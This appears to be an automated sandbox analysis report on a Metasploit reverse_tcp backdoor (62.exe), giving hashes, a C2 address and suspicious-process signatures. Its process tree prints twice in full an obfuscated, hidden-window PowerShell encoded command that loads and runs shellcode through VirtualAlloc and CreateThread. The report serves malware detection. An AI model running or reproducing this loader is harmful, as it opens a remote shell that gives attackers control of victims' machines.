metasploit | a9065daea54083ef8f8496d8120fd5aafb5cd64699f0ea241b2ad96f08fb9e2c

General

Target

62.exe
Size

17KB
MD5

c057a7606fbf30b436abd1a54c120e5b
SHA1

2a265c41281f39bd682e19bf223a83b878f541ee
SHA256

a9065daea54083ef8f8496d8120fd5aafb5cd64699f0ea241b2ad96f08fb9e2c
SHA512

baaa36cff95808633402c794abc354d8018eb1492b4e71ad0e48e32685cf7d8f756fecc47c8c3bbea41a6b5ef264fb3bb00574d16777fab5df2a6604642fe402
SSDEEP

384:9EEoLO56ayzcMj+2+X+Kc9IDqwFCYgaw7hwmc39nfTlyv7yJC/:aE8O56lcV2+XCXYgaw7zctfTlyv7yJC/

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

173.212.219.45:6006

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe
15	4728	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2056	powershell.exe
2056	powershell.exe
4728	powershell.exe
4728	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 4408	2052	62.exe	83
PID 2052 wrote to memory of 4408	2052	62.exe	83
PID 4408 wrote to memory of 2056	4408	cmd.exe	84
PID 4408 wrote to memory of 2056	4408	cmd.exe	84
PID 2056 wrote to memory of 4728	2056	powershell.exe	85
PID 2056 wrote to memory of 4728	2056	powershell.exe	85
PID 2056 wrote to memory of 4728	2056	powershell.exe	85
PID 4728 wrote to memory of 3932	4728	powershell.exe	87
PID 4728 wrote to memory of 3932	4728	powershell.exe	87
PID 4728 wrote to memory of 3932	4728	powershell.exe	87
PID 3932 wrote to memory of 4864	3932	csc.exe	88
PID 3932 wrote to memory of 4864	3932	csc.exe	88
PID 3932 wrote to memory of 4864	3932	csc.exe	88

C:\Users\Admin\AppData\Local\Temp\62.exe
"C:\Users\Admin\AppData\Local\Temp\62.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABaAGgAMwBYACAAPQAgACcAJABHADQATQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABHADQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA3ACwAMAB4AGIAYgAsADAAeAAyADAALAAwAHgANgBmACwAMAB4ADIANAAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4ADcAOAAsADAAeAA3AGMALAAwAHgAYwA2ACwAMAB4ADUAMAAsADAAeAA4ADQALAAwAHgANgBhACwAMAB4ADgAOQAsADAAeAA5AGIALAAwAHgANwA0ACwAMAB4ADYAYgAsADAAeABmADYALAAwAHgAMQAyACwAMAB4ADkAMQAsADAAeAA1AGEALAAwAHgAMgA0ACwAMAB4ADQAMAAsADAAeABkADIALAAwAHgAYwBmACwAMAB4AGYAOAAsADAAeAAwADIALAAwAHgAYgA2ACwAMAB4AGUAMwAsADAAeAA3ADMALAAwAHgANAA2ACwAMAB4ADIAMgAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4ADQAZgAsADAAeAA3AGIALAAwAHgANwA4ACwAMAB4AGYAOQAsADAAeAAzADgALAAwAHgAMwAxACwAMAB4AGEAMAAsADAAeAAzADcALAAwAHgAOAA3ACwAMAB4ADYAOQAsADAAeAA5ADAALAAwAHgANQA2ACwAMAB4ADcAYgAsADAAeAA3ADMALAAwAHgAYwA1ACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADgALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADYALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABkAGMALAAwAHgAMQAzACwAMAB4AGYAYgAsADAAeAA0AGUALAAwAHgANgA5ACwAMAB4ADYAMQAsADAAeABjADAALAAwAHgANgBmACwAMAB4AGIAZAAsADAAeABlAGQALAAwAHgANwA4ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAMwAyACwAMAB4ADAAYwAsADAAeABhADQALAAwAHgAYwAzACwAMAB4ADYAMgAsADAAeABiAGQALAAwAHgAYgBmACwAMAB4ADgAYgAsADAAeAA5AGEALAAwAHgAYgA1ACwAMAB4ADkAOAAsADAAeAAyAGIALAAwAHgAOQBhACwAMAB4ADEAYQAsADAAeAA5AGQALAAwAHgAZQAyACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAZAA3ACwAMAB4ADcAZgAsADAAeAAyADQALAAwAHgANQAyACwAMAB4AGUANgAsADAAeABhADkALAAwAHgANwA0ACwAMAB4ADkAYgAsADAAeABkADgALAAwAHgAOQA1ACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4AGQAMwAsADAAeABjADIALAAwAHgANQAwACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANwBmACwAMAB4ADYAMwAsADAAeABkAGIALAAwAHgANQBhACwAMAB4ADUAYgAsADAAeABlADYALAAwAHgAZgBjACwAMAB4AGYAZAAsADAAeAAyADgALAAwAHgANQAwACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADAANwAsADAAeABhAGEALAAwAHgAZgAzACwAMAB4ADQAYQAsADAAeAA0ADMALAAwAHgAZgA0ACwAMAB4ADEANwAsADAAeAA0AGQALAAwAHgAOAAwACwAMAB4ADgAZQAsADAAeAAyAGMALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA0ADEALAAwAHgAYQA1ACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANAA1ACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAMgBkACwAMAB4AGQAYwAsADAAeAA0AGIALAAwAHgAMgA2ACwAMAB4ADUAMgAsADAAeAAzAGUALAAwAHgAMwAzACwAMAB4ADkANwAsADAAeABmADYALAAwAHgAMwA0ACwAMAB4AGQANgAsADAAeABjAGUALAAwAHgAOAA3ACwAMAB4AGIANAAsADAAeAAyADgALAAwAHgAZQBmACwAMAB4AGQANQAsADAAeAAyADIALAAwAHgAZQA0ACwAMAB4ADMAZAAsADAAeABlADYALAAwAHgAYgAyACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAAyAGQALAAwAHgAZQBjACwAMAB4ADMAMQAsADAAeABhADkALAAwAHgAYQA2ACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4AGEAMQAsADAAeABjAGQALAAwAHgAMQA5ACwAMAB4ADAAMgAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADkAYQAsADAAeAA3ADMALAAwAHgAZQBiACwAMAB4AGYANgAsADAAeABjAGUALAAwAHgAMgAzACwAMAB4ADgAMwAsADAAeABkAGYALAAwAHgANgBlACwAMAB4AGEAOAAsADAAeAA1ADMALAAwAHgAZQAwACwAMAB4AGIAYQAsADAAeAA0ADUALAAwAHgANQBlACwAMAB4ADcANgAsADAAeABlADgALAAwAHgANABlACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAOQBhACwAMAB4ADYAYwAsADAAeAAzAGEALAAwAHgAYQA0ACwAMAB4ADIAYwAsADAAeABmADgALAAwAHgAZABjACwAMAB4ADkAYQAsADAAeAA4ADAALAAwAHgAYQBhACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgANwAxACwAMAB4ADAAYgAsADAAeAAyADEALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgAMQBlACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgANABlACwAMAB4ADMANwAsADAAeABjADgALAAwAHgANABiACwAMAB4ADIANwAsADAAeAA2AGYALAAwAHgANgA0ACwAMAB4AGYANQAsADAAeAA2ADIALAAwAHgAZgBiACwAMAB4ADEANQAsADAAeABmAGEALAAwAHgAYgA4ACwAMAB4ADgAMQAsADAAeAAxADUALAAwAHgANwAwACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAZABiACwAMAB4ADcAMQAsADAAeAAzAGEALAAwAHgANgA1ACwAMAB4ADgAYgAsADAAeAA3ADEALAAwAHgANwAxACwAMAB4AGQANwAsADAAeAAxAGQALAAwAHgAOABkACwAMAB4AGEAZgAsADAAeAA3ADIALAAwAHgAYQAxACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgAZAA1ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA2ACwAMAB4ADAAMAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4AGEAOAAsADAAeAA2ADcALAAwAHgANABiACwAMAB4ADkANQAsADAAeAAzAGMALAAwAHgAYwA4ACwAMAB4ADIAMwAsADAAeABkAGEALAAwAHgAZAAwACwAMAB4AGMAOAAsADAAeABiADMALAAwAHgAOABjACwAMAB4AGIAYQAsADAAeABjADgALAAwAHgAZABiACwAMAB4ADYAOAAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAZQAsADAAeAA3ADYALAAwAHgAMABhACwAMAB4ADgAZgAsADAAeAA1ADMALAAwAHgAZQAzACwAMAB4AGIANQAsADAAeABlADYALAAwAHgAMAAwACwAMAB4AGEANAAsADAAeABkAGQALAAwAHgAMAA0ACwAMAB4ADcAZgAsADAAeAA4ADIALAAwAHgANAAxACwAMAB4AGYANgAsADAAeABhAGEALAAwAHgAMQAyACwAMAB4AGIAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeABhAGYALAAwAHgAZgAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB2ADUAZgBNAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB2ADUAZgBNAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB2ADUAZgBNACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBoADMAWAApACkAOwAkAFIAcwBiACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBoAE0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBoAE0AIAAkAFIAcwBiACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFIAcwBiACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABaAGgAMwBYACAAPQAgACcAJABHADQATQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABHADQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA3ACwAMAB4AGIAYgAsADAAeAAyADAALAAwAHgANgBmACwAMAB4ADIANAAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADMALAAwAHgAMAAzACwAMAB4ADcAOAAsADAAeAA3AGMALAAwAHgAYwA2ACwAMAB4ADUAMAAsADAAeAA4ADQALAAwAHgANgBhACwAMAB4ADgAOQAsADAAeAA5AGIALAAwAHgANwA0ACwAMAB4ADYAYgAsADAAeABmADYALAAwAHgAMQAyACwAMAB4ADkAMQAsADAAeAA1AGEALAAwAHgAMgA0ACwAMAB4ADQAMAAsADAAeABkADIALAAwAHgAYwBmACwAMAB4AGYAOAAsADAAeAAwADIALAAwAHgAYgA2ACwAMAB4AGUAMwAsADAAeAA3ADMALAAwAHgANAA2ACwAMAB4ADIAMgAsADAAeAA3ADcALAAwAHgAZgAxACwAMAB4ADQAZgAsADAAeAA3AGIALAAwAHgANwA4ACwAMAB4AGYAOQAsADAAeAAzADgALAAwAHgAMwAxACwAMAB4AGEAMAAsADAAeAAzADcALAAwAHgAOAA3ACwAMAB4ADYAOQAsADAAeAA5ADAALAAwAHgANQA2ACwAMAB4ADcAYgAsADAAeAA3ADMALAAwAHgAYwA1ACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADgALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADYALAAwAHgANQA1ACwAMAB4ADUAOQAsADAAeABkAGMALAAwAHgAMQAzACwAMAB4AGYAYgAsADAAeAA0AGUALAAwAHgANgA5ACwAMAB4ADYAMQAsADAAeABjADAALAAwAHgANgBmACwAMAB4AGIAZAAsADAAeABlAGQALAAwAHgANwA4ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAMwAyACwAMAB4ADAAYwAsADAAeABhADQALAAwAHgAYwAzACwAMAB4ADYAMgAsADAAeABiAGQALAAwAHgAYgBmACwAMAB4ADgAYgAsADAAeAA5AGEALAAwAHgAYgA1ACwAMAB4ADkAOAAsADAAeAAyAGIALAAwAHgAOQBhACwAMAB4ADEAYQAsADAAeAA5AGQALAAwAHgAZQAyACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAZAA3ACwAMAB4ADcAZgAsADAAeAAyADQALAAwAHgANQAyACwAMAB4AGUANgAsADAAeABhADkALAAwAHgANwA0ACwAMAB4ADkAYgAsADAAeABkADgALAAwAHgAOQA1ACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4AGQAMwAsADAAeABjADIALAAwAHgANQAwACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANwBmACwAMAB4ADYAMwAsADAAeABkAGIALAAwAHgANQBhACwAMAB4ADUAYgAsADAAeABlADYALAAwAHgAZgBjACwAMAB4AGYAZAAsADAAeAAyADgALAAwAHgANQAwACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADAANwAsADAAeABhAGEALAAwAHgAZgAzACwAMAB4ADQAYQAsADAAeAA0ADMALAAwAHgAZgA0ACwAMAB4ADEANwAsADAAeAA0AGQALAAwAHgAOAAwACwAMAB4ADgAZQAsADAAeAAyAGMALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA0ADEALAAwAHgAYQA1ACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANAA1ACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAMgBkACwAMAB4AGQAYwAsADAAeAA0AGIALAAwAHgAMgA2ACwAMAB4ADUAMgAsADAAeAAzAGUALAAwAHgAMwAzACwAMAB4ADkANwAsADAAeABmADYALAAwAHgAMwA0ACwAMAB4AGQANgAsADAAeABjAGUALAAwAHgAOAA3ACwAMAB4AGIANAAsADAAeAAyADgALAAwAHgAZQBmACwAMAB4AGQANQAsADAAeAAyADIALAAwAHgAZQA0ACwAMAB4ADMAZAAsADAAeABlADYALAAwAHgAYgAyACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAAyAGQALAAwAHgAZQBjACwAMAB4ADMAMQAsADAAeABhADkALAAwAHgAYQA2ACwAMAB4ADIAYQAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4AGEAMQAsADAAeABjAGQALAAwAHgAMQA5ACwAMAB4ADAAMgAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADkAYQAsADAAeAA3ADMALAAwAHgAZQBiACwAMAB4AGYANgAsADAAeABjAGUALAAwAHgAMgAzACwAMAB4ADgAMwAsADAAeABkAGYALAAwAHgANgBlACwAMAB4AGEAOAAsADAAeAA1ADMALAAwAHgAZQAwACwAMAB4AGIAYQAsADAAeAA0ADUALAAwAHgANQBlACwAMAB4ADcANgAsADAAeABlADgALAAwAHgANABlACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAOQBhACwAMAB4ADYAYwAsADAAeAAzAGEALAAwAHgAYQA0ACwAMAB4ADIAYwAsADAAeABmADgALAAwAHgAZABjACwAMAB4ADkAYQAsADAAeAA4ADAALAAwAHgAYQBhACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgANwAxACwAMAB4ADAAYgAsADAAeAAyADEALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgAMQBlACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgANABlACwAMAB4ADMANwAsADAAeABjADgALAAwAHgANABiACwAMAB4ADIANwAsADAAeAA2AGYALAAwAHgANgA0ACwAMAB4AGYANQAsADAAeAA2ADIALAAwAHgAZgBiACwAMAB4ADEANQAsADAAeABmAGEALAAwAHgAYgA4ACwAMAB4ADgAMQAsADAAeAAxADUALAAwAHgANwAwACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAZABiACwAMAB4ADcAMQAsADAAeAAzAGEALAAwAHgANgA1ACwAMAB4ADgAYgAsADAAeAA3ADEALAAwAHgANwAxACwAMAB4AGQANwAsADAAeAAxAGQALAAwAHgAOABkACwAMAB4AGEAZgAsADAAeAA3ADIALAAwAHgAYQAxACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgAZAA1ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA2ACwAMAB4ADAAMAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4AGEAOAAsADAAeAA2ADcALAAwAHgANABiACwAMAB4ADkANQAsADAAeAAzAGMALAAwAHgAYwA4ACwAMAB4ADIAMwAsADAAeABkAGEALAAwAHgAZAAwACwAMAB4AGMAOAAsADAAeABiADMALAAwAHgAOABjACwAMAB4AGIAYQAsADAAeABjADgALAAwAHgAZABiACwAMAB4ADYAOAAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAZQAsADAAeAA3ADYALAAwAHgAMABhACwAMAB4ADgAZgAsADAAeAA1ADMALAAwAHgAZQAzACwAMAB4AGIANQAsADAAeABlADYALAAwAHgAMAAwACwAMAB4AGEANAAsADAAeABkAGQALAAwAHgAMAA0ACwAMAB4ADcAZgAsADAAeAA4ADIALAAwAHgANAAxACwAMAB4AGYANgAsADAAeABhAGEALAAwAHgAMQAyACwAMAB4AGIAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADYAMAAsADAAeABhAGYALAAwAHgAZgAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAB2ADUAZgBNAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB2ADUAZgBNAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB2ADUAZgBNACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBoADMAWAApACkAOwAkAFIAcwBiACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAawBoAE0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawBoAE0AIAAkAFIAcwBiACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFIAcwBiACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
